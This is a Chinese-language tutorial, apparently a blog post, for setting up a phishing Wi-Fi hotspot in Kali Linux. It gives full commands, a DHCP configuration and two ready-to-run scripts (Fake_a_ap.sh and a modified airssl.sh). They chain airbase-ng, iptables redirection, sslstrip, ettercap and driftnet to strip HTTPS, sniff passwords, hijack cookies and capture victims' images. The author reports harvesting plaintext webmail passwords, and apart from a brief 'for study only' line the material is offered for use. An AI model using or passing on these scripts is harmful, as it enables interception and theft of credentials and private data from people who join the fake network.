釣魚WIFI搭建

1、無線網卡

2、KaliLinux操作系統，這里就不用說了，必備的

3、isc-dhcp-server服務器。安裝好KaliLinux后只需要apt-get update 然后apt-get install isc-dhcp-server即可

4、Aircrack-ng套件   #用來發送數據

5、sslstrip       用來突破SSL加密

6、ettercap     用來嗅探劫持

 

后面三個軟件KaliLinux都自帶有，不用安裝即可。

首先強調下，后面的bash腳本適用於使用isc-dhcp-server這個bash腳本，建立釣魚熱點。

 

安裝dhcp服務

apt-get install isc-dhcp-server

配置文件分別在/etc/default/isc-dhcp-server和/etc/dhcp/dhcpd.conf，前者可以配置監聽端口，這里以wlan0為例

配置dhcp文件后，斷開wlan0的網絡，分配一個ip

ifconfig wlan0 192.168.1.2/24

 

啟動dhcp服務

/etc/init.d/isc-dhcp-server start 或者

service isc-dhcp-server start

 

建立熱點：

將下文寫好的airssl.sh添加執行權限

bash airssl.sh

然后分別是AP建立，DHCP建立，sslstrip開啟，ettercap開啟。

這里再介紹一種方法，是使用 airbase-ng + dhcpd 創建虛擬WiFi熱點；順便使用 sslstrip+ettercap 進行中間人攻擊，嗅探使用者的上網信息和劫持cookie！

所需要的軟件如下；kali-linux都已經自帶了，其他的系統可以自行安裝：
Aircrack-ng 套件    #用來發送數據
isc-dhcp-server    #簡單的dhcp服務器
sslstrip       #突破ssl加密
ettercap      #嗅探劫持

leaf /etc/dhcp/dhcpd.conf   編輯dhcp服務器配置文件，修改如下：

authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "FreeWiFi";
option domain-name-servers 10.0.0.1;

range 10.0.0.10 10.0.0.100;

}

然后激活網卡至監聽模式：
airmon-ng start wlan0
airbase-ng -e FreeWiFi -c 6 mon0
此時虛擬wifi的信號已經發送出去了，如果出現錯誤：
Error: Got channel -1, expected a value > 0.
執行如下命令：

airmon-ng stop mon0

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

然后從激活網卡至監聽模式那里重新開始。
接着執行如下命令：

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start

虛擬WiFir熱點創建成功，接下來就是嗅探欺騙釣魚了：

sslstrip -fpk 10000
ettercap -Tpuqi at0

然后就等着魚兒上鈎吧！

手機上測試了下，網易郵箱直接明文密碼：

 
百度使用了加密：

 

 寫了一個腳本，修改成自己的設置每次執行就ok了：
復制下面代碼，保存為 “Fake_a_ap.sh”，然后 chmod +x Fake_a_ap.sh && ./Fake_a_ap.sh 

#!/bin/sh

echo "即將創建WiFi熱點，請確保dhcpd.conf已經配置好！" &
sleep 5

ifconfig wlan0 down #wlan0修改成你的網卡
iwconfig wlan0 mode monitor
ifconfig wlan0 up

airmon-ng start wlan0 &
sleep 5 
airbase-ng -e FreeWiFi -c 6 mon0 & #修改成自己的熱點名稱和信道
sleep 5

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush && iptables --table nat --flush && iptables --table nat --flush && iptables --table nat --delete-chain &

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
sleep 2
/etc/init.d/isc-dhcp-server start &
sleep 5
sslstrip -fpk 10000 &
ettercap -puTqi at0

 

 

代碼如下：

 

#!/bin/bash  
# 修改版，原版信息如下：  
########################################################  
# ©opyright 2009 - killadaninja - Modified G60Jon 2010  
# airssl.sh - v1.0  
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh  
########################################################  
# Network questions  
echo "AIRSSL_KALI"  
echo "修該版本，適用於kali或者使用isc-dhcp-server的環境，原版信息如下："  
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon  "  
echo "僅供學習用途"  
echo  
route -n -A inet | grep UG  
echo "DNS服務器.例如8.8.8.8: "  
read -e dnsip  
echo "網關地址.例如192.168.0.1:"  
read -e gatewayip  
echo "接入internet的接口.例如eth1: "  
read -e internet_interface  
echo "用於建立AP的接口.例如wlan0: "  
read -e fakeap_interface  
echo "AP的ESSID: "  
read -e ESSID  
airmon-ng start $fakeap_interface  
fakeap=$fakeap_interface  
fakeap_interface="mon0"  
  
# Dhcpd creation  
mkdir -p "/pentest/wireless/airssl"  
cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.bak  
cp /etc/default/isc-dhcp-server /etc/default/isc-dhcp-server.bak  
echo "ddns-update-style none;  
default-lease-time 600;  
max-lease-time 7200;  
authoritative;  
log-facility local7;  
">/etc/dhcp/dhcpd.conf  
  
echo -n "subnet 192.168.0.0 netmask 255.255.255.0 {  
  range 192.168.0.100 192.168.0.200;   
  option domain-name-servers ">>/etc/dhcp/dhcpd.conf  
echo -n $dnsip>>/etc/dhcp/dhcpd.conf  
echo -n ";  
# option domain-name "internal.example.org";  
  option routers ">>/etc/dhcp/dhcpd.conf  
echo -n $gatewayip>>/etc/dhcp/dhcpd.conf  
echo -n ";  
  option broadcast-address 192.168.0.255;  
 default-lease-time 600;  
 max-lease-time 7200;  
}" >> /etc/dhcp/dhcpd.conf  
echo "  
DHCPD_CONF=/etc/dhcp/dhcpd.conf  
DHCPD_PID=/var/run/dhcpd.pid  
INTERFACES="at0"  
">/etc/default/isc-dhcp-server  
# Fake ap setup  
echo "[+] Configuring FakeAP...."  
echo  
echo "Airbase-ng will run in its most basic mode, would you like to  
configure any extra switches? "  
echo  
echo "Choose Y to see airbase-ng help and add switches. "  
echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "  
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and slave will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "  
echo "Y, N or A "  
  
read ANSWER  
  
if [ $ANSWER = "y" ] ; then  
airbase-ng --help  
fi  
  
if [ $ANSWER = "y" ] ; then  
echo  
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be  
redefined, also in this mode you MUST define a channel "  
read -e aswitch  
echo  
echo "[+] Starting FakeAP..."  
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!  
sleep 2  
fi  
  
if [ $ANSWER = "a" ] ; then  
echo  
echo "[+] Starting FakeAP..."  
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!  
sleep 2  
fi  
  
if [ $ANSWER = "n" ] ; then  
echo  
echo "[+] Starting FakeAP..."  
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!  
sleep 2  
fi  
  
# Tables  
echo "[+] Configuring forwarding tables..."  
ifconfig lo up  
ifconfig at0 up &  
sleep 1  
ifconfig at0 $gatewayip netmask 255.255.255.0  
ifconfig at0 mtu 1400  
route add -net 192.168.0.0 netmask 255.255.255.0 gw $gatewayip   
iptables --flush  
iptables --table nat --flush  
iptables --delete-chain  
iptables --table nat --delete-chain  
echo 1 > /proc/sys/net/ipv4/ip_forward  
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip  
iptables -P FORWARD ACCEPT  
iptables --append FORWARD --in-interface at0 -j ACCEPT  
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE  
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000  
  
# DHCP  
echo "[+] Setting up DHCP..."  
#touch /var/run/dhcpd.pid  
#chown dhcpd:dhcpd /var/run/dhcpd.pid  
#xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!  
#sleep 3  
/etc/init.d/isc-dhcp-server start  
# Sslstrip  
echo "[+] Starting sslstrip..."  
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!  
sleep 2  
  
# Ettercap  
echo "[+] Configuring ettercap..."  
echo  
echo "Ettercap will run in its most basic mode, would you like to  
configure any extra switches for example to load plugins or filters,  
(advanced users only), if you are unsure choose N "  
echo "Y or N "  
read ETTER  
if [ $ETTER = "y" ] ; then  
ettercap --help  
fi  
  
if [ $ETTER = "y" ] ; then  
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here  
For the sake of airssl, ettercap WILL USE -u and -p so you are advised  
NOT to use -M, also -i is already set and CANNOT be redifined here.  
Ettercaps output will be saved to /pentest/wireless/airssl/passwords  
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "  
echo  
read "eswitch"  
echo "[+] Starting ettercap..."  
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!  
sleep 1  
fi  
  
if [ $ETTER = "n" ] ; then  
echo  
echo "[+] Starting ettercap..."  
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!  
sleep 1  
fi  
  
# Driftnet  
echo  
echo "[+] Driftnet?"  
echo  
echo "Would you also like to start driftnet to capture the victims images,  
(this may make the network a little slower), "  
echo "Y or N "  
read DRIFT  
  
if [ $DRIFT = "y" ] ; then  
mkdir -p "/pentest/wireless/airssl/driftnetdata"  
echo "[+] Starting driftnet..."  
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!  
sleep 3  
fi  
  
xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!  
  
clear  
echo  
echo "[+] Activated..."  
echo "Airssl is now running, after slave connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "  
echo  
echo "[+] IMPORTANT..."  
echo "使用完畢請鍵入Y恢復系統配置，否則可能會出現問題！"  
read WISH  
  
# Clean up  
if [ $WISH = "y" ] ; then  
echo  
echo "[+] Cleaning up airssl and resetting iptables..."  
  
kill ${fakeapid}  
kill ${dchpid}  
kill ${sslstripid}  
kill ${ettercapid}  
kill ${dritnetid}  
kill ${sslstriplogid}  
  
airmon-ng stop $fakeap_interface  
airmon-ng stop $fakeap  
echo "0" > /proc/sys/net/ipv4/ip_forward  
iptables --flush  
iptables --table nat --flush  
iptables --delete-chain  
iptables --table nat --delete-chain  
mv /etc/default/isc-dhcp-server.bak /etc/default/isc-dhcp-server  
mv /etc/dhcp/dhcpd.conf.bak /etc/dhcp/dhcpd.conf  
/etc/init.d/isc-dhcp-server stop   
  
echo "[+] Clean up successful..."  
echo "[+] Thank you for using airssl, Good Bye..."  
exit  
  
fi  
exit